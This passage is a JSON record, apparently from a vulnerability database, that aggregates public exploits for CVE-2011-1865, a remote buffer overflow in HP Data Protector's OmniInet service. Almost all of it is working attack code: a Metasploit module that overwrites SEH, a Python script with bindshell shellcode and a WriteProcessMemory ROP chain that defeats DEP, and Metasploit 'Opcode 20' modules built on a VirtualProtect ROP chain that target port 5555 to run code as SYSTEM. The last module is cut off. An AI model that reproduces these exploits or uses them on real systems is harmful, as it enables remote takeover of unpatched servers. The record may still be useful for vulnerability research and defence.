check\r\n\r\n\t\tconnect\r\n\t\tsock.put(rand_text_alpha_upper(64))\r\n\t\tresp = sock.get_once(-1,5)\r\n\t\tdisconnect\r\n\r\n\t\tif (resp)\r\n\t\t\tresp = resp.unpack('v*').pack('C*')\r\n\t\t\tprint_status(\"Received response: \" + 
resp)\r\n\r\n\t\t\t# extract version\r\n\t\t\tif (resp =~ /HP Data Protector/)\r\n\t\t\t\tversion = resp.split[3]\r\n\t\t\telsif (resp =~ /HP OpenView Storage Data Protector/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telsif (resp =~ /HP StorageWorks Application Recovery Manager/)\r\n\t\t\t\tversion = resp.split[5]\r\n\t\t\telse\r\n\t\t\t\treturn Exploit::CheckCode::Detected\r\n\t\t\tend\r\n\r\n\t\t\tversion = version.split('.')\r\n\t\t\tmajor = version[1].to_i\r\n\t\t\tminor = version[2].to_i\r\n\t\t\tif ((major < 6) or (major == 6 and minor < 11))\r\n\t\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\t\tend\r\n\r\n\t\t\tif ((major > 6) or (major == 6 and minor >= 11))\r\n\t\t\t\treturn Exploit::CheckCode::Safe\r\n\t\t\tend\r\n\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\ttrigger = rand_text_alpha_upper(10000)\r\n\t\ttrigger[4552, payload.encoded.length] = payload.encoded\r\n\t\ttrigger[5352, 8] = generate_seh_record(target.ret) \r\n\t\ttrigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string\r\n\r\n\t\topcode = \"27\"\r\n\r\n\t\tpacket = Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << \"\\x27\\xca\" #length\r\n\t\tpacket << \"\\xff\\xfe\\x32\"\r\n\t\tpacket << \"\\x00\\x00\\x00\"\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpacket << trigger\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\")\r\n\t\tpacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24 \r\n\r\n\t\tprint_status(\"Trying #{target.name}...\")\r\n\t\tsock.put(packet)\r\n\t\t\r\n\t\tselect(nil,nil,nil,10)\r\n\t\thandler\r\n\t\tdisconnect\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
"https://www.exploit-db.com/download/17467/"}, {"lastseen": "2016-02-02T07:55:38", "description": "HP Data Protector 6.11 Remote Buffer Overflow DEP ROP. CVE-2011-1865. Remote exploit for windows platform", "published": "2011-07-02T00:00:00", "type": "exploitdb", "title": "HP Data Protector 6.11 - Remote Buffer Overflow + DEP Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-02T00:00:00", "id": "EDB-ID:17468", "href": "https://www.exploit-db.com/exploits/17468/", "sourceData": "#!/usr/bin/python\r\n# HP Data Protector 6.11 Remote Buffer Overflow\r\n# Tested on Windows 2003 R2 + DEP Enabled\r\n# Authors: muts & dookie\r\n# Reference: http://www.exploit-db.com/exploits/17458/\r\n# Reference: http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\r\n# http://www.offensive-security.com/0day/hp-dataprotector.py.txt\r\n\r\nimport struct, socket, sys\r\ntarget = sys.argv[1]\r\n\r\n# bindshell - port 4444\r\nshellcode = (\"\\xbf\\x83\\x75\\x7f\\xdd\\xdb\\xc8\\xd9\\x74\\x24\\xf4\\x5e\\x33\\xc9\\xb1\"\r\n\"\\x56\\x31\\x7e\\x13\\x03\\x7e\\x13\\x83\\xee\\x7f\\x97\\x8a\\x21\\x97\\xd1\"\r\n\"\\x75\\xda\\x67\\x82\\xfc\\x3f\\x56\\x90\\x9b\\x34\\xca\\x24\\xef\\x19\\xe6\"\r\n\"\\xcf\\xbd\\x89\\x7d\\xbd\\x69\\xbd\\x36\\x08\\x4c\\xf0\\xc7\\xbc\\x50\\x5e\"\r\n\"\\x0b\\xde\\x2c\\x9d\\x5f\\x00\\x0c\\x6e\\x92\\x41\\x49\\x93\\x5c\\x13\\x02\"\r\n\"\\xdf\\xce\\x84\\x27\\x9d\\xd2\\xa5\\xe7\\xa9\\x6a\\xde\\x82\\x6e\\x1e\\x54\"\r\n\"\\x8c\\xbe\\x8e\\xe3\\xc6\\x26\\xa5\\xac\\xf6\\x57\\x6a\\xaf\\xcb\\x1e\\x07\"\r\n\"\\x04\\xbf\\xa0\\xc1\\x54\\x40\\x93\\x2d\\x3a\\x7f\\x1b\\xa0\\x42\\x47\\x9c\"\r\n\"\\x5a\\x31\\xb3\\xde\\xe7\\x42\\x00\\x9c\\x33\\xc6\\x95\\x06\\xb0\\x70\\x7e\"\r\n\"\\xb6\\x15\\xe6\\xf5\\xb4\\xd2\\x6c\\x51\\xd9\\xe5\\xa1\\xe9\\xe5\\x6e\\x44\"\r\n\"\\x3e\\x6c\\x34\\x63\\x9a\\x34\\xef\\x0a\\xbb\\x90\\x5e\\x32\\xdb\\x7d\\x3f\"\r\n\"\\x96\\x97\\x6c\\x54\\xa0\\xf5\\xf8\\x99\\x9f\\x05\\xf9\\xb5\\xa8\\x76\\xcb\"\r\n\"\\x1a\\x03\\
x11\\x67\\xd3\\x8d\\xe6\\x88\\xce\\x6a\\x78\\x77\\xf0\\x8a\\x50\"\r\n\"\\xbc\\xa4\\xda\\xca\\x15\\xc4\\xb0\\x0a\\x99\\x11\\x16\\x5b\\x35\\xc9\\xd7\"\r\n\"\\x0b\\xf5\\xb9\\xbf\\x41\\xfa\\xe6\\xa0\\x69\\xd0\\x91\\xe6\\xa7\\x00\\xf2\"\r\n\"\\x80\\xc5\\xb6\\xe5\\x0c\\x43\\x50\\x6f\\xbd\\x05\\xca\\x07\\x7f\\x72\\xc3\"\r\n\"\\xb0\\x80\\x50\\x7f\\x69\\x17\\xec\\x69\\xad\\x18\\xed\\xbf\\x9e\\xb5\\x45\"\r\n\"\\x28\\x54\\xd6\\x51\\x49\\x6b\\xf3\\xf1\\x00\\x54\\x94\\x88\\x7c\\x17\\x04\"\r\n\"\\x8c\\x54\\xcf\\xa5\\x1f\\x33\\x0f\\xa3\\x03\\xec\\x58\\xe4\\xf2\\xe5\\x0c\"\r\n\"\\x18\\xac\\x5f\\x32\\xe1\\x28\\xa7\\xf6\\x3e\\x89\\x26\\xf7\\xb3\\xb5\\x0c\"\r\n\"\\xe7\\x0d\\x35\\x09\\x53\\xc2\\x60\\xc7\\x0d\\xa4\\xda\\xa9\\xe7\\x7e\\xb0\"\r\n\"\\x63\\x6f\\x06\\xfa\\xb3\\xe9\\x07\\xd7\\x45\\x15\\xb9\\x8e\\x13\\x2a\\x76\"\r\n\"\\x47\\x94\\x53\\x6a\\xf7\\x5b\\x8e\\x2e\\x07\\x16\\x92\\x07\\x80\\xff\\x47\"\r\n\"\\x1a\\xcd\\xff\\xb2\\x59\\xe8\\x83\\x36\\x22\\x0f\\x9b\\x33\\x27\\x4b\\x1b\"\r\n\"\\xa8\\x55\\xc4\\xce\\xce\\xca\\xe5\\xda\")\r\n\r\nwpm = \"\\x55\\x23\\xe4\\x77\" # 77E42355 WriteProcessMemory - Win2k3 \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Return after WPM \r\nwpm += \"\\xff\\xff\\xff\\xff\" # hProcess \r\nwpm += \"\\x50\\xd0\\x4b\\x00\" # 004bd050 omniinet.exe - Address to Patch \r\nwpm += \"\\x41\\x41\\x41\\x41\" # lpBuffer placeholder (Shellcode Address) \r\nwpm += \"\\x42\\x42\\x42\\x42\" # nSize placeholder (Shellcode Size) 00001000\r\nwpm += \"\\x38\\xd4\\x4b\\x00\" # 004BD438 omniinet.exe - Pointer for Written Bytes \r\n\r\n# pre\r\npacket = 
(\"\\x00\\x00\\x27\\xCA\\xFF\\xFE\\x32\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x32\\x00\\x30\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\")\r\n\r\n# padding to EIP\r\npacket +=\"A\"* 2004\r\n# Get a copy of ESP into a register for safekeeping\r\npacket +=\"\\x1f\\x59\\x37\\x7c\" # 0x7c37591f PUSH ESP # ADD EAX,DWORD PTR DS:[EAX] # ADD CH,BL # INC EBP # OR AL,59 # POP ECX # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # junk to pop into EBP\r\n\r\n# Jump over the WPM parameters\r\npacket += \"\\xfe\\x9b\\x35\\x7c\" # 0x7c359bfe : # ADD ESP,20 # RETN \r\npacket += wpm\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Get EAX to point at our shellcode on the stack and overwrite the placeholder\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN \r\npacket += \"\\x1c\\x3b\\x37\\x7c\" # 0x7c373b1c : # ADD EAX,100 # POP EBP # RETN\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\xd4\\x3d\\x43\\x00\" # 0x00433dd4 : # MOV DWORD PTR DS:[ECX+18],EAX # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\n\r\n# Craft the shellcode size in EAX and overwrite the placeholder\r\npacket += \"\\x2e\\x40\\x34\\x7c\" # 0x7c34402e : # POP EDX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x59\\x3d\\x41\\x41\" # Value to SUB from EAX \r\npacket += \"\\x23\\x62\\x37\\x7c\" # 0x7c376223 : # POP EAX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x41\\x41\\x41\\x41\" # To be the sub-ee 41413D59\r\npacket += \"\\xe9\\xfa\\x36\\x7c\" # 0x7c36fae9 : # SUB EAX,EDX # POP ESI # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x69\\x60\\x37\\x7c\" # 0x7c376069 : # MOV DWORD PTR 
DS:[ECX+1C],EAX # POP EDI # POP ESI # POP EBX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x44\" * 12 # filler\r\n\r\n# Point ESP to WPM and the stack and return\r\npacket += \"\\x40\\xa0\\x35\\x7c\" # 0x7c35a040 : # MOV EAX,ECX # RETN ** [MSVCR71.dll]\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x66\\x61\\x43\\x00\" # 0x00436166 : # ADD EAX,2 # POP EBP # RETN ** [omniinet.exe]\r\npacket += \"\\x44\" * 4 # filler\r\npacket += \"\\x05\\x8b\\x34\\x7c\" # 0x7c348b05 : # XCHG EAX,ESP # RETN ** [MSVCR71.dll]\r\npacket += \"\\x45\" * 8\r\npacket +=\"\\x90\" *120\r\npacket += shellcode\r\npacket +=\"C\"* 980000\r\n# post\r\npacket +=(\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\"\r\n\"\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\"\r\n\"\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\"\r\n\"\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\\x20\\x00\\x61\\x00\\x00\\x00\")\r\n\r\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nsock.connect((target, 5555))\r\nsock.send(packet)\r\nsock.close()\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17468/"}, {"lastseen": "2016-02-02T07:58:21", "description": "HP OmniInet.exe Opcode 20 Buffer Overflow. CVE-2011-1865. 
Remote exploit for windows platform", "published": "2011-07-04T00:00:00", "type": "exploitdb", "title": "HP OmniInet.exe Opcode 20 - Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-04T00:00:00", "id": "EDB-ID:17490", "href": "https://www.exploit-db.com/exploits/17490/", "sourceData": "##\r\n# $Id: hp_omniinet_4.rb 13096 2011-07-04 22:33:47Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in HP Data Protector's OmniInet\r\n\t\t\t\tprocess. By supplying a long string of data as the file path with opcode '20',\r\n\t\t\t\ta buffer overflow can occur when this data is being written on the stack where\r\n\t\t\t\tno proper bounds checking is done beforehand, which results arbitrary code\r\n\t\t\t\texecution under the context of SYSTEM. 
This module is also made against systems\r\n\t\t\t\tsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\r\n\t\t\t\tenabled by default.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 13096 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Oren Isacson', #Initial discovery, poc\r\n\t\t\t\t\t'muts', #Initial poc of the ROP exploit w/ dookie\r\n\t\t\t\t\t'dookie', #Initial poc of the ROP exploit w/ muts\r\n\t\t\t\t\t'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\r\n\t\t\t\t\t'corelanc0d3r', #MSF module with sinn3r\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-1865' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.exploit-db.com/exploits/17468/' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\r\n\t\t\t\t\t[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t#If 'Max' gets too long (ie. 
10000 bytes), we can get a busted heap\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on XP SP3 or Win Server 2003',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 2005, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on Win Server 2008',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\r\n\t\t\t\t\t\t\t'Ret' => 0x7C342629, #RETN - MSVCR71.dll\r\n\t\t\t\t\t\t\t'Max' => 5000,\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Jun 29 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options([Opt::RPORT(5555)], self.class)\r\n\tend\r\n\r\n\tdef nop\r\n\t\treturn make_nops(4).unpack(\"L\")[0].to_i\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t#mona.py tekniq\r\n\t\t#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\r\n\t\trop = [\r\n\t\t\t#Initial setup\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t0x7C342629, # SLIDE\r\n\t\t\t#ROP begins here\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # Make EAX readable\r\n\t\t\t0x7c37591f, # PUSH ESP # ... 
# POP ECX # POP EBP # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EBP\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c37a140, # <- VirtualProtect() found in IAT\r\n\t\t\t0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0b, # Slide, so next gadget would write to correct stack location\r\n\t\t\t0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\r\n\t\t\tnop, # EDI (filler)\r\n\t\t\tnop, # will be patched at runtime (VP), then picked up into ESI\r\n\t\t\tnop, # EBX (filler)\r\n\t\t\t0x7c376402, # POP EBP # RETN (msvcr71.dll)\r\n\t\t\t0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0xfffff82f, # size 20001 bytes\r\n\t\t\t0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c354901, # POP EBX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffff, # pop value into ebx\r\n\t\t\t0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\r\n\t\t\t0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\r\n\t\t\t0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\r\n\t\t\t0x7c34b8d8, # ROP NOP (-> edi)\r\n\t\t\t0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\r\n\t\t\t0xffffffc0, # value to negate, target value : 0x00000040, target: edx\r\n\t\t\t0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\r\n\t\t\t0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\r\n\t\t\t0x90909090, # NOPS (-> eax)\r\n\t\t\t0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\r\n\t\t].pack('V*')\r\n\r\n\t\t#Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\r\n\t\t#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\r\n\t\tsploit = ''\r\n\t\tsploit << rand_text_alpha(target['Offset']-sploit.length)\r\n\t\tsploit << [target.ret].pack('V*')\r\n\t\tsploit << rop\r\n\t\tsploit << payload.encoded\r\n\t\tsploit << 
rand_text_alpha(target['Max']-sploit.length)\r\n\r\n\t\tpkt = ''\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << \"\\x41\\x41\" #Length field place holder\r\n\t\tpkt << \"\\xff\\xfe\"\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x32\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\")\r\n\t\tpkt << Rex::Text.to_unicode(\"20\") #Opcode\r\n\t\tpkt << \"\\x00\"\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7)\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x20\\x00\")\r\n\t\tpkt << sploit\r\n\t\tpkt << Rex::Text.to_unicode(\"\\x00\")\r\n\t\tpkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16)\r\n\r\n\t\t#pkt length\r\n\t\tpkt[2,2] = [pkt.length-5].pack('n')\r\n\r\n\t\tprint_status(\"Sending packet to #{datastore['RHOST']}...\")\r\n\t\tsock.put(pkt)\r\n\r\n\t\t#Data Protector lags before triggering the vuln code\r\n\t\t#Long delay seems necessary to ensure we get a shell back\r\n\t\tselect(nil,nil,nil,20)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17490/"}], "metasploit": [{"lastseen": "2020-10-06T00:46:30", "description": "This module exploits a vulnerability found in HP Data Protector's OmniInet process. By supplying a long string of data as the file path with opcode '20', a buffer overflow can occur when this data is being written on the stack where no proper bounds checking is done beforehand, which results arbitrary code execution under the context of SYSTEM. 
This module is also made against systems such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR enabled by default.\n", "published": "2011-07-04T17:02:40", "type": "metasploit", "title": "HP OmniInet.exe Opcode 20 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/HP_OMNIINET_4", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\",\n 'Description' => %q{\n This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. 
This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Oren Isacson', #Initial discovery, poc\n 'muts', #Initial poc of the ROP exploit w/ dookie (WPM())\n 'dookie', #Initial poc of the ROP exploit w/ muts (WPM())\n 'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD)\n 'corelanc0d3r <peter.ve[at]corelan.be>', #MSF module with sinn3r, VP() ROP Chain\n ],\n 'References' =>\n [\n [ 'CVE', '2011-1865' ],\n [ 'OSVDB', '73571'],\n [ 'EDB', '17468' ],\n [ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd\n },\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => \"process\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #If 'Max' gets too long (ie. 10000 bytes), we can get a busted heap\n [\n 'HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008',\n {\n 'Offset' => 1993, #For overwriting a RETN (6481 for SEH)\n 'Ret' => 0x7C342629, #RETN - MSVCR71.dll\n 'Max' => 5000,\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 29 2011\",\n 'DefaultTarget' => 0))\n\n register_options([Opt::RPORT(5555)])\n end\n\n def nop\n return make_nops(4).unpack(\"L\")[0].to_i\n end\n\n def exploit\n\n connect\n\n #mona.py tekniq\n #https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/\n rop = [\n #Initial setup - ROP Flight Landing Strip\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n 0x7C342629, # SLIDE\n #ROP begins here\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # Make EAX readable\n 0x7c37591f, # PUSH ESP # ... 
# POP ECX # POP EBP # RETN (MSVCR71.dll)\n nop, # EBP\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x7c37a140, # <- VirtualProtect() found in IAT\n 0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll)\n 0x7c346c0b, # Slide, so next gadget would write to correct stack location\n 0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll)\n nop, # EDI (filler)\n nop, # will be patched at runtime (VP), then picked up into ESI\n nop, # EBX (filler)\n 0x7c376402, # POP EBP # RETN (msvcr71.dll)\n 0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0xfffff82f, # size 20001 bytes\n 0x7c351e05, # NEG EAX # RETN (MSVCR71.dll)\n 0x7c354901, # POP EBX # RETN (MSVCR71.dll)\n 0xffffffff, # pop value into ebx\n 0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll)\n 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll)\n 0x7c34d201, # POP ECX # RETN (MSVCR71.dll)\n 0x7c38b001, # RW pointer (lpOldProtect) (-> ecx)\n 0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll)\n 0x7c34b8d8, # ROP NOP (-> edi)\n 0x7c344f87, # POP EDX # RETN (MSVCR71.dll)\n 0xffffffc0, # value to negate, target value : 0x00000040, target: edx\n 0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll)\n 0x7c346c0a, # POP EAX # RETN (MSVCR71.dll)\n 0x90909090, # NOPS (-> eax)\n 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll)\n ].pack('V*')\n\n #Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\"\n #4807 bytes after target.ret, but we need to use less than that to avoid a busted heap\n sploit = ''\n sploit << rand_text_alpha(target['Offset']-sploit.length)\n sploit << [target.ret].pack('V*')\n sploit << rop\n sploit << payload.encoded\n sploit << rand_text_alpha(target['Max']-sploit.length)\n\n pkt = ''\n pkt << Rex::Text.to_unicode(\"\\x00\")\n pkt << \"\\x41\\x41\" #Length field place holder\n pkt << \"\\xff\\xfe\"\n pkt << Rex::Text.to_unicode(\"\\x32\\x00\")\n pkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5)\n pkt << 
